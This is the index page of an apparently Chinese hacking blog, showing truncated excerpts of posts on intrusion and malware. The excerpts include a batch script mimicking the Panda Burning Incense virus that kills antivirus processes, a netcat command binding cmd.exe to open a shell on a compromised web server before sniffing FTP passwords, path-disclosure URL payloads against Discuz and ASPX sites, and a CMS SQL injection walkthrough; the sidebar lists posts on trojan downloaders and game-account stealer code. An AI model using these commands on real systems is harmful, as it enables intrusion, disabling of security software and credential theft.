-
公告
- 黑夜给了我黑色的眼睛去寻找光明,阳光给了我明亮的眼睛我却是去寻找黑暗,所以我只有在夜里才出现真实的自己。(菩提本不树,明镜亦非台,本来无一物,何处染尘埃。)
-
写作时间
-
原创下载
-
最新文章
- [04/29]大半个月的上班族
- [04/29]Google 黑客搜索技巧
- [04/23]绕过主动防御 木马病毒刺穿卡巴斯基
- [04/16]老牌社区K666再度易主 续谈当年情
- [04/14]第一天上班。
- [04/14]华夏[破还原-穿主动]完美下载者
- [04/10]第一次应凭。
- [04/08]百度K后重收经验!
- [04/06]Themida & WinLicen V1.9.1.0--V1.9.5.0 系列脱壳脚本.By.fxyang[CUG]
- [04/05]拿站之---郁闷!
- [04/02]新站建立难!
- [03/31]嘿嘿,小说站有进步!
- [03/28]五天来的琐碎片段。
- [03/23]完美世界EXE包含部分代码
- [03/22]完美世界截取和发信部分代码
-
最新评论
-
文章归档
-
Statistics
- 文章总数:154
- 评论总数:47
- 引用总数:0
- 浏览总数:121178
- 留言总数:0
- 当前样式:4u-HK
- 当前语言:zh-CN
-
友情链接
- 反木马在线
- 热门小说网
- 老喜 'S Blog
- 示波器
- 中国电脑论坛
- 交换友情链接请与QQ:287963907联系.审核非违法网站都可通过!
-
反向链接
Apr29th
Google 黑客搜索技巧
站内搜索地址为: httpwww.google.comcustomdomains=(这里写我们要搜索的站点,比如feelids.com) 进去可以选择www和feelids.com, 当然再选我们要的站内搜索哦! 黑客专用信息和资料搜索地址为: httpwww.google.comcustomhl=xx-hacker 这里是google关键字的用法,要设置它为中文,则是 httpwww.google.comcustomhl=z...0 comments
Apr23th
绕过主动防御 木马病毒刺穿卡巴斯基
本文转自:电脑报 安全诊所的值班医生张帆,正在查询一些资料。这时推门进入一位病人。病人称他最近一段时间,很多和自己相关的网络账户都被盗了,想让医生看看是什么原因。 张帆医生询问患者有没有安装杀毒软件。患者称自己安装的杀毒软件是最新版本的卡巴斯基,不但每天准时更新病毒库,并且还打上了系统的所有补丁。 听了病人的讲述,张帆医生说:在排除系统漏洞情况下,能够绕过卡巴斯基的防御的木马就只有Evilotus。 Evilotus木马档案 Evilotus木马是由“一步江湖”...Mar13th
笑天网站管理系统漏洞分析利用详解
今天我们要进行检测的是笑天网站管理系统(ShotanCMD V3.0)官方网站地址:http://www.shotan.com 我们在本地服务器上架设起来,看一下还是比较美观的,如下图所示:
接下来,我们就对这个网站系统的安全性进行一次检测。我们打开网站管理系统的评论页面代码。存在漏洞的文件是 pinglun.asp。查看它的源文件,我们发现有以下几行代码:set rs...
Mar11th
信息搜集和反信息搜集在实战中的应用
{转载请著明出处PopSky 'S BlogWww.PopSky.OrgQQ:396421483}什么是信息搜集信息搜集,俗称“踩点”是对目标主机及相关设施、管理人员进行公开或非公开的检测,用于对目标安全防卫工作的掌握。比如对目标主机操作系统的鉴别等。这是攻击的前奏,内容可以包括系统,网络,数据及用户活动状态及其行为,而且有时还需在计算机网络系统中的若干不同关键点来搜集所需信息。中国有句古话“知己知彼,百战不殆”这个知彼讲的就是对入侵目标的了解了。...Mar11th
一段用批处理完成的部分熊猫烧香病毒功能
版权归FISCO所有,只提供为学习使用。。。@echo offREM 以下批处理内容中止众多安全软件进程tskill Mcshield.exe & tskill VsTskMgr.exe & tskillnaPrdMgr.exe & tskill UpdaterUI.exe & tskill TBMon.exe &a...Mar11th
浅析注入漏洞的查与补
阿D、NBSI、HDSI等工具可以帮我们快速的拿下一个有注入漏洞的站点。但如果不懂注入原理,即便用这些工具进入无数个网站,最终还是一个工具菜鸟。所以我们菜鸟要进化,就不能停留在工具方面。我们要深入到程序内部,从源码入手,掌握注入的第一手资料。想了解注入漏洞的内幕吗?那就跟我来吧!注入点的查找 当我们想要测试某个站点时,一般会架上注入工具对其狂轰乱炸。这样做虽然没错,但是比较盲目。我个人认为:如果有源码的话就从源码入手,在源码中查找注入点。对于源码的阅读,有些朋友可能会认为这很难。其实源码并不神秘...Mar11th
蜜罐&蜜网_Hack hell(概述)
本文将通过solairs10操作系统与windowns操作系统来完成一次蜜罐的架设过程,使用到两种工具分别为Honeypot和VMware。前置说明,本文可能比较的理论化,将设计到蜜罐,蜜网,资源,成本,黑客等方面技术!第一部分:什么是蜜罐:蜜罐( Honeypot) 是一种专门设计成被扫描、攻击和入侵的网络资源. 它的目的就是建立一个诱骗环境吸引攻击者和入侵者,观察并且以日志的形式记录其在里面的活动,并且使攻击者在蜜罐中耗费精力和技术,从而保护了真正有价值的正常的...Mar11th
低权限下FTP密码的嗅探
在获得了网站的webshell权限后,我们找到可以执行的目录(2000系统下 c:\winnt\system32\inetsrv\data),然后上传我们的瑞士军刀——NC。在webshell中执行命令nc.exe -l -p 1000 -e cmd.exe。然后本机运行nc.exe *.*.*.* 1000 得到对方的CMDshell。再上传我们的sniff.exe工具。在webs...Mar11th
两个暴物理路径的办法
1、漏洞描述:DISCUZ5 暴库漏洞在url后+&extra%5B%5D=page%3D1#pid1453,即可以暴出目标地址的绝对路径如:http://www.target.com/xxx.php?id=qq&extra%5B%5D=page%3D1#pid14532、漏洞描述:ASPX暴库漏洞在ASPX文件前加~符号,可以暴出该ASPX文件在目标地址的绝对路径如:http://www.target.com/~qq.aspx ...Mar9th
